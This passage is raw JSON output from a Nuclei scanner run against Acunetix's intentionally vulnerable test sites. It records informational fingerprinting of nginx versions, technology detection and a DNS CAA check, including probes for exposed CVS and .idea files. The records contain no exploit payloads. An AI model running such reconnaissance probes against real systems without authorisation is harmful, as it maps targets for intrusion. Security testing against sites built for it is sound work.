AUTHORITY SECTION:\\nvulnweb.com.\\t1800\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:42.287018966Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4845.178 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:42 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:42.668038359Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4845.178 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 56968\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 56968\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t1798\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:43.239211028Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.557621037Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.560304739Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.578985664Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.58068409Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.580775224Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"path\":\"/CVS/Root\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Root\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /CVS/Root HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.5993914Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testphp.vulnweb.com/CVS/Root'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:43 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:43.599502886Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angular\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: 